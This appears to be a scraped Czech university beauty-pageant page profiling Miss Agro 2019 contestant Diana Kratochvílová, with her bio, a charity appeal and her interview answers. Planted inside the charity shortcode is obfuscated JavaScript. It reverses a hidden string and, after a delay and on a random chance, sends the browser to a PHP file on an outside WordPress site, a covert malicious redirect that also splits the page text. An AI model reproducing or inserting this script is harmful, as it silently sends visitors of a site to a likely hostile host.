Diana Kratochvílová

Profil

Fakulta: PEF
Obor: Podnikání a administrativa (PAAN)
Ročník: 4.
Věk:
23

Diana je obyčejná holka z Moravy, která hodně tráví čas se svojí rodinou a kamarády. Vyrůstala se 3 bratry, takže i když vypadá jako malé nevinné hříbě, ve skutečnosti je to statný rytíř, který dobývá svět. Tvrdohlavost patří mezi její slabé stránky a těžko se jí o něčem přesvědčuje. Na druhou stranu je ale velmi empatická a spolehlivá osoba, která má ráda společnost a ze srdce nesnáší nudu. Řídí se motem: „Existuje tisíce způsobů, jak zabít čas, ale žádný, jak ho vzkřísit.“ Je potřeba si život užívat každým okamžikem a nepromarnit ani minutu.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Mám hodně vykutálené kamarádky, které mě do soutěže přihlásily na tajňačku, takže je těžké odpovídat na tuhle otázku. Každopádně bych chtěla říct, že při rozhodování, jestli do soutěže jít, jsem měla dva pocity, které se ve mě probouzely. Strach z neznáma a touha po zážitku. Jsem ráda, že jsem nakonec strach překonala. Pro mě je typické, že se raduji z každé maličkosti, takže já beru za vítězství už to, že jsem měla možnost získat nové zkušenosti, nezapomenutelné zážitky a opravdu fajnové lidi. To, že bych si došla i pro korunku, by byla taková sladká třešnička na dortu. Nejspíš to zní trošku klišé, ale dokud to člověk sám nepozná, nepochopí.

Máš nějaký životní vzor? Čím Tě inspiruje?

Vzor jako takový nemám. Nikdy jsem se podle nikoho neřídila. Raději si jedu na svojí vlně a řídím se vlastním srdcem a rozumem. Každopádně je jedna osoba, u které se mi líbí její povaha. Je to Phoebe z Přátel. Mám ráda její naivitu a pozitivní myšlení, a i když je občas trochu natvrdlá, je jí jedno, co si o ní ostatní myslí. Je svá, a to se mi na ní líbí.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Těžká otázka… První, co se mi vybavilo, byla Ekonometrie. Na tomto předmětu jsem se začala potit už při první hodině, tak nejspíš proto.

Na co se v soutěži Miss Agro těšíš nejvíc?

Já popravdě zatím nemám tušení do čeho jdu, takže je to pro mě jedno velké překvapení. Každopádně sem zastáncem toho, že člověk si má užívat každý životní moment, takže já to vnímám jako možnost získat skvělé zážitky, možná i nějaké ty trapasy, ale i to patří k životu. Těším se na to, až to budu jednou vyprávět svým dětem i vnoučatům.